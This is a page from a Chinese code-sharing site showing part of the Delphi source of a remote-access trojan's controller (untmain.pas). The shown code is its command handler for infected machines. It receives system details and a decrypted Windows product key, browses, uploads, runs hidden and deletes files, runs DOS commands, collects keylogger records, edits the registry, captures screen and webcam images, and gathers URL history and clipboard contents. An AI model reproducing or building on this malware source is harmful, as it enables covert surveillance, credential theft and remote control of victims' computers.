⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 untmain.pas

📁 由于该木马有三个服务端可以选择生成
💻 PAS
📖 第 1 页 / 共 3 页
字号:
🔍
123 
      if copy(form9.listbox1.Items[a],length(form9.listbox1.Items[a]),1)='0' then
      view.SubItems.Add('已停用') else
      view.SubItems.Add('已启用');
      end;
      edit2.text:='6';
      form9.StatusBar1.Panels[0].text:='服务信息接收完毕.';
      end else
      form9.StatusBar1.Panels[0].text:='正在接收服务列表信息...50%';
      end;
 5:   begin
      s:=encrypttext(fbuf);
      form9.memo1.Text:=form9.memo1.Text+s;
      if copy(s,length(s),1)='^' then
      begin
      form9.ListBox1.Items.Text:=form9.Memo1.Text ;
      form2.Edit1.Text:=form9.listbox1.items[0];
      for a:=1 to form9.listbox1.items.Count-2 do
      begin
      view:=form9.ListView3.Items.add;
      b:=pos('|',form9.ListBox1.Items[a]);
      View.Caption:=copy(form9.listbox1.Items[a],b+1,length(form9.listbox1.Items[a])-b);
      view.SubItems.add(copy(form9.listbox1.Items[a],1,b-1));
      end;
      edit2.text:='6';
      form9.listview3.Columns[1].caption:='共'+inttostr(form9.listview3.items.Count)+'个进程';
      form9.StatusBar1.Panels[0].Text :='进程信息接收完毕';
      end else
      form9.StatusBar1.Panels[0].text:='正在接收进程信息...50%';
      end;
 6: begin
    Cmd:=EncryptText(fbuf);
    if not isnum(copy(cmd,1,2)) then
    exit;
    Case strtoint(copy(cmd,1,2)) of
11:  begin
     s:='11';
     send(socket.SocketHandle,s[1],2,0);
     end;
12:  begin
      form9.ListBox1.Items.Text:=copy(cmd,3,len-2);
      if sinsrvs.ItemFocused.SubItems[6]<>' ' then
      x:='有' else x:='无';
      if sinsrvs.ItemFocused.SubItems[8]<>' ' then
      y:='有' else y:='无';
      form9.ListView1.Items.Add.Caption:='已开机时间: '+form9.listbox1.Items[3];
      form9.ListView1.Items.Add.Caption:=' ';
      form9.ListView1.Items.Add.Caption:='系统类型: '+sinsrvs.ItemFocused.SubItems[0];
      form9.ListView1.Items.Add.Caption:='计算机名称: '+sinsrvs.ItemFocused.Caption;
      form9.ListView1.Items.Add.Caption:='当前用户: '+form9.ListBox1.Items[0];
      form9.ListView1.Items.Add.Caption:='管理员权限: '+y;
      form9.ListView1.Items.Add.Caption:='系统时间: '+form9.ListBox1.Items[7];
      form9.ListView1.Items.Add.Caption:=' ';
      form9.ListView1.Items.Add.Caption:='CPU: '+form9.ListBox1.Items[1];
      form9.ListView1.Items.Add.Caption:='内存: '+form9.listbox1.Items[2];
      form9.ListView1.Items.Add.Caption:='屏幕分辨率: '+form9.ListBox1.Items[4];
      form9.ListView1.Items.Add.Caption:='屏幕刷新率: '+form9.ListBox1.Items[6]+' HZ';
      form9.ListView1.Items.Add.Caption:='摄像头: '+x;
      form9.ListView1.Items.Add.Caption:='国名:  '+form9.ListBox1.Items[5];
      form9.ListView1.Items.Add.Caption:=' ';
      form9.ListView1.Items.Add.Caption:='上线方式: '+sinsrvs.ItemFocused.SubItems[1];
      form9.ListView1.Items.Add.Caption:='IP地址: '+socket.RemoteAddress;
      form9.ListView1.Items.Add.Caption:='地理位置: '+sinsrvs.ItemFocused.SubItems[3];
      form9.ListView1.Items.Add.Caption:=' ';
      form9.ListView1.Items.Add.Caption:='客户端版本: 木偶2008.5.12';
      form9.StatusBar1.panels[0].Text:='系统信息接收完毕.';
      end;
13:   begin
       a:=strtoint(copy(cmd,4,len-3));
       if copy(cmd,3,1)='y' then
       sinsrvs.Items[a].SubItems[5]:='执行成功'
       else
       sinsrvs.Items[a].SubItems[5]:='下载失败';
      end;
14:   begin
      a:=strtoint(copy(cmd,4,len-3));
      if copy(cmd,3,1)='y' then
      sinsrvs.Items[a].SubItems[5]:='执行成功'
      else
      sinsrvs.Items[a].SubItems[5]:='下载失败';
      end;
15:   begin
       s:=copy(cmd,3,len-2);
       a :=0;
       while a < 32 do
       begin
       SScanf(Pchar(copy(s,1,2)),'%02x',[@cryp_pk[a]]);
       delete(s,1,2);
       inc(a);
       end;
       plain_pk[a]:=#0;
       DecodeProdKey(plain_pk,cryp_pk,29,15);
       form9.Memo2.Text :='(已解密)系统安装序列号: '+plain_PK;
       form9.StatusBar1.Panels[0].Text:='系统安装序列号接收完毕.';
      end;
16:  begin
      form2.ComboBox1.Items.Text:=copy(cmd,3,len-2);
      form2.ComboBox2.Items.Text:=copy(cmd,3,len-2);
      form2.PageControl1.Enabled:=true;
      form2.StatusBar1.Panels[0].text:='磁盘驱动器信息接收完毕.';
     end;
17:  begin
      if copy(cmd,3,2)='-1' then
      begin
       s:=copy(form2.Edit1.text,1,length(form2.Edit1.text)-1);
       d:=lastpos('\',s);
       if d<>0 then
       form2.Edit1.text:=copy(s,1,d);
       form2.PageControl1.Enabled :=true;
       form2.statusbar1.panels[0].text:='文件信息接收完毕.';
       exit;
      end;
      b:=pos('|',cmd);
      if b=0 then
      form2.ListBox1.Items.Text:=copy(cmd,3,len-2)
      else begin
      form2.listbox1.items.text:=copy(cmd,3,b-3);//文件夹
      form2.ListBox2.Items.Text:=copy(cmd,b+1,len-b); //文件
      end;
      for a:=0 to form2.listbox1.items.Count-1 do
      form2.ListView1.Items.add.Caption:=form2.listbox1.Items[a];
      for c:=0 to form2.listbox2.items.Count-1 do
      begin
      view:=form2.ListView2.Items.Add;
      view.Caption:=form2.listbox2.Items[c];
      if (lowercase(extractfileext(form2.listbox2.Items[c]))='.rar') or
      (lowercase(extractfileext(form2.listbox2.Items[c]))='.zip') or
      (lowercase(extractfileext(form2.listbox2.Items[c]))='.cab') then
       view.ImageIndex :=8 else
      if (lowercase(extractfileext(form2.listbox2.Items[c]))='.jpg') or
      (lowercase(extractfileext(form2.listbox2.Items[c]))='.png') then
      view.ImageIndex :=5 else
      if lowercase(extractfileext(form2.listbox2.Items[c]))='.gif' then
      view.ImageIndex :=3 else
      if lowercase(extractfileext(form2.listbox2.Items[c]))='.bmp' then
      view.ImageIndex :=7 else
      if lowercase(extractfileext(form2.listbox2.Items[c]))='.exe' then
      view.ImageIndex :=2 else
      if (lowercase(extractfileext(form2.listbox2.Items[c]))='.txt') or
      (lowercase(extractfileext(form2.listbox2.Items[c]))='.ini') or
      (lowercase(extractfileext(form2.listbox2.Items[c]))='.inf') or
      (lowercase(extractfileext(form2.listbox2.Items[c]))='.doc') then
      view.ImageIndex :=10 else
      if (lowercase(extractfileext(form2.listbox2.Items[c]))='.htm') or
     (lowercase(extractfileext(form2.listbox2.Items[c]))='.html') then
      view.ImageIndex :=4 else
      if (lowercase(extractfileext(form2.listbox2.Items[c]))='.bat') or
     (lowercase(extractfileext(form2.listbox2.Items[c]))='.com') then
      view.ImageIndex :=1 else
     if (lowercase(extractfileext(form2.listbox2.Items[c]))='.dll') or
     (lowercase(extractfileext(form2.listbox2.Items[c]))='.sys') then
     view.ImageIndex :=11 else
     if (lowercase(extractfileext(form2.listbox2.Items[c]))='.mp3') or
    (lowercase(extractfileext(form2.listbox2.Items[c]))='.wav') or
    (lowercase(extractfileext(form2.listbox2.Items[c]))='.wmv') or
    (lowercase(extractfileext(form2.listbox2.Items[c]))='.wma') or
    (lowercase(extractfileext(form2.listbox2.Items[c]))='.avi') then
     view.ImageIndex :=6 else
    if (lowercase(extractfileext(form2.listbox2.Items[c]))='.chm') then
    view.ImageIndex :=12 else
    view.ImageIndex :=9;
    end;
    form2.PageControl1.Enabled :=true;
    form2.statusbar1.panels[0].text:='远程文件信息接收完毕.';
    end;
18:  begin
     if strtoint(copy(cmd,3,len-2))>1024 then
     MessageBox(0,pchar(inttostr(strtoint(copy(cmd,3,len-2)) div 1024)
     + ' KB'),pchar('文件大小'),mb_ok) else
     MessageBox(0,pchar(copy(cmd,3,len-2)
     + ' 字节'),pchar('文件大小'),mb_ok);
     form2.statusbar1.panels[0].text:='文件大小数据接收完毕.';
     form2.statusbar3.panels[0].text:='文件大小数据接收完毕.';
     end;
19:  begin
     form9.listbox1.items.text:=copy(cmd,3,len-2);
     for a:=0 to form9.listbox1.items.Count-1 do
     if form9.listbox1.Items[a]<>'' then
     form9.ListView2.Items.Add.Caption:=form9.listbox1.Items[a];
     form9.listview2.Columns[0].caption:='共'+inttostr(form9.listview2.items.Count)+'个可视窗口 (包括子窗口)';
     form9.StatusBar1.Panels[0].Text :='远程窗口信息接收完毕.';
     end;
20:  form9.StatusBar1.Panels[0].Text :='指定窗口关闭完成.';
21:  begin
     form2.statusbar1.panels[0].text:='远程文件打开完成-正常方式.';
     form2.statusbar3.panels[0].text:='远程文件打开完成-正常方式.';
     end;
22:  if copy(cmd,3,1)='1' then
     begin
     form2.statusbar1.panels[0].text:='远程文件删除成功.';
     form2.statusbar3.panels[0].text:='远程文件删除成功.';
     end else
     begin
     form2.statusbar1.panels[0].text:='远程文件删除失败.';
     form2.statusbar3.panels[0].text:='远程文件删除失败.';
     end;
23:  if copy(cmd,3,1)='0' then
     form2.StatusBar1.Panels[0].Text:='文件上传失败.'
     else
     begin
     a:=fileopen(form2.Edit2.Text,fmopenread);
     if a<=0 then exit;
     f:=getfilesize(a,nil);
     getmem(p,f);
     readfile(a,p^,f,byteswritten,nil);
     send(socket.SocketHandle,p^,f,0);
     closehandle(a);
     freemem(p);
     end;
24:  form2.StatusBar1.Panels[0].Text:='文件全部删除完成.';       
25:  if copy(cmd,3,1)='1' then
     form9.StatusBar1.Panels[0].Text :='指定进程终止成功.'
     else
     form9.StatusBar1.Panels[0].Text :='指定进程终止失败,可能是权限不够.';
26:  begin
     form9.Memo1.text:=copy(cmd,3,len-2);
     form9.StatusBar1.Panels[0].text:='DOS命令执行完毕.';
     end;
27:  if copy(cmd,3,1)='1' then
     begin
     form9.memo2.Text:=copy(cmd,4,len-3);
     form9.StatusBar1.Panels[0].Text:='键盘记录信息接收完毕.';
     end else
     form9.StatusBar1.Panels[0].Text:='没有发现键盘记录信息.';
28:  if strtoint(copy(cmd,3,len-2))<=0 then
     begin
     form2.StatusBar1.Panels[0].text:='不能下载该文件.';
     form2.StatusBar3.Panels[0].text:='不能下载该文件.';
     end else
     begin
     form2.Edit3.Text:=copy(cmd,3,len-2);
     if form2.Edit5.text='1' then
     edit2.text:='1' else edit2.text:='0';
     s:='29'+form2.Edit2.Text;
     send(socket.SocketHandle,s[1],length(s),0);
     end;
29:  begin
     form2.statusbar1.panels[0].text:='远程文件打开完成-隐藏方式.';
     form2.statusbar3.panels[0].text:='远程文件打开完成-隐藏方式.';
     end;
30:  begin
      form2.ListBox1.Items.Text:=copy(cmd,3,len-2);
      for a:=0 to form2.ListBox1.Items.Count-1 do
      form2.ListView3.Items.Add.Caption:=form2.ListBox1.Items[a];
      form2.SpeedButton1.Enabled:=true;
      form2.speedbutton5.Enabled:=false;
      form2.PageControl1.Enabled:=true;
      form2.StatusBar3.Panels[0].Text:='指定文件搜索完毕.';
     end;
31:  form9.StatusBar1.Panels[0].text:='指定服务开启完毕.';
32:  form9.StatusBar1.Panels[0].text:='指定服务停止完毕.';
33:  if strtoint(copy(cmd,3,len-2))>0 then
     begin
      form11.edit1.text:=copy(cmd,3,len-2);
      edit2.text:='3';
      s:='34';
      send(socket.SocketHandle,s[1],2,0);
     end else
     begin
      form11.StatusBar1.Panels[0].Text:='没有发现屏幕图像文件.';
      form11.N1.Enabled:=true;
     end;
34:  begin
      form2.ListView3.Items.Add.Caption:=copy(cmd,3,len-2);
      form2.PageControl1.Enabled :=true;
      form2.StatusBar3.Panels[0].Text:='墙纸的路径信息接收完毕.';
     end;
35:  begin
      jie:=GetTickCount;
      sinsrvs.Items[strtoint(copy(cmd,3,len-2))].SubItems[7]:=inttostr(jie-kai);
     end;
36:  begin
      a:=pos('~',cmd);
      if a=0 then
      form7.ListBox2.Items.Text:=copy(cmd,3,len-2)
      else
      begin
      form7.ListBox2.Items.Text:=copy(cmd,3,a-3);  //项名
      form7.ListBox3.Items.Text:=copy(cmd,a+1,len-a);//键名和键值
      end;
      form7.tv.Items.BeginUpdate ;
      for d:=0 to form7.ListBox2.Count-1 do
      form7.tv.Items.AddChild(form7.tv.Selected,form7.ListBox2.Items[d]);
      form7.tv.Selected.Expand(true);
      form7.tv.Items.EndUpdate ;
      for c:=0 to form7.ListBox3.Count-1 do
      begin
      b:=pos('|',form7.ListBox3.Items[c]);
      if b=0 then break;
      e:=pos('^',form7.ListBox3.Items[c]);
      if e=0 then break;
      view:=form7.ListView1.Items.add;
      s:=copy(form7.listbox3.items[c],b+1,e-b-1);
      view.Caption:=copy(form7.listbox3.items[c],1,b-1);
      view.SubItems.Add(s);
      view.SubItems.Add(Copy(form7.listbox3.Items[c],e+1,
      length(form7.ListBox3.Items[c])-e));
      if (s='REG_DWORD') or (s='REG_BINARY') or (s='REG_NONE') or
      (s='REG_DWORD_BIG_ENDIAN') then
      view.ImageIndex:=2 else
      view.ImageIndex:=1;
      end;
     form7.tv.Enabled :=true;
     form7.ListView1.Enabled :=true;
     form7.statusbar1.Panels[0].text:='远程注册表信息接收完毕.';
     end;
37:  form7.statusbar1.Panels[0].text:='远程注册表字符串值新建完毕.';
38:  form7.statusbar1.Panels[0].text:='远程注册表二进制值新建完毕.';
39:  form7.statusbar1.Panels[0].text:='远程注册表双字节值新建完毕.';
40:  form7.statusbar1.Panels[0].text:='远程注册表键值删除完毕.';
41:  form7.statusbar1.Panels[0].text:='远程注册表项新建完毕.';
42:  form7.statusbar1.Panels[0].text:='远程注册表项删除完毕.';
43:  if strtoint(copy(cmd,3,len-2))>0 then
     begin
     form10.edit1.text:=copy(cmd,3,len-2);
     edit2.text:='2';
     s:='44';
     send(socket.SocketHandle,s[1],2,0);
     end else
     begin
     form10.StatusBar1.Panels[0].Text:='没有发现视频图像文件.';
     form10.N1.Enabled:=true;
     end;
44:  begin
     form2.ListBox3.Items.Text:=copy(cmd,3,len-2);
     for a:=0 to form2.ListBox3.Items.count-1 do
     form2.ListView4.Items.Add.Caption:=form2.listbox3.Items[a];
     form2.SpeedButton6.Enabled:=true;
     form2.SpeedButton7.Enabled:=false;   
     form2.StatusBar4.Panels[0].Text:='局域网共享资源扫描完毕.';
     end; 
45:  begin
     form9.ListBox1.Items.Text:=copy(cmd,3,len-2);
     for a:=0 to form9.ListBox1.Items.count-1 do
     form9.ListView5.Items.Add.Caption:=form9.listbox1.Items[a];
     form9.StatusBar1.Panels[0].Text:='URL历史记录接收完毕.';
     end; 
46:  begin
     s:=copy(cmd,3,len-2);
     a:=pos('~',s);
     b:=pos('^',s);
     c:=pos('|',s);
     d:=pos('!',s);
     e:=pos('%',s);
     view:=Sinsrvs.items.Add;
     view.Caption:=Copy(s,b+1,c-b-1);
     view.SubItems.Add(Copy(s,1,a-1));
     view.SubItems.Add(Copy(s,a+1,b-a-1));
     view.SubItems.Add(copy(s,c+1,e-c-1));
     view.SubItems.Add(IPAddr(Socket.RemoteAddress));
     view.SubItems.Add(inttostr(socket.sockethandle));
     view.SubItems.Add('......');
     if copy(s,d+1,1)='1' then
     view.SubItems.Add('√') else
     view.SubItems.Add(' ');
     view.SubItems.Add(Copy(s,d+2,length(s)-d-2));
     if copy(s,length(s),1)='1' then
     view.SubItems.Add('√') else
     view.SubItems.Add(' ');
     view.SubItems.Add(Copy(s,e+1,d-e-1));
     if form1.CheckBox1.Checked then
     PlaySound(PChar('sound\上线提示.wav'), 0, SND_ASYNC); 
     if form1.CheckBox2.Checked then
     begin
     msnpopup1.Title:=#13+'有主机上线!    ';
     msnpopup1.Text:=#13+#13+Socket.RemoteAddress;
     msnpopup1.ShowPopUp;
     end;
     statusbar1.panels[1].text:='上线主机数: '+inttostr(sinsrvs.items.Count);
     end;
47:  begin
     a:=lastpos('<',cmd);
     b:=strtoint(copy(cmd,a+1,len-a));
     c:=strtoint(form2.Edit3.Text);
     form2.StatusBar1.Panels[0].Text:='正在上传文件...'+inttostr(b*100 div c)+'%';
     if b>=c then
     form2.StatusBar1.Panels[0].Text:='文件上传完毕.';
     end;
48:  if copy(cmd,3,1)='1' then
     form2.StatusBar1.Panels[0].Text:='指定文件夹新建成功.'
     else
     form2.StatusBar1.Panels[0].Text:='指定文件夹新建失败.';
49:  if copy(cmd,3,1)='1' then
     form2.StatusBar1.Panels[0].Text:='指定文件夹删除成功.'
     else
     form2.StatusBar1.Panels[0].Text:='指定文件夹删除失败,可能内容非空.';
50:  if copy(cmd,3,1)='0' then
     form9.StatusBar1.Panels[0].Text:='剪贴板信息获取失败,可能内容为空.'
     else
     begin
123

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -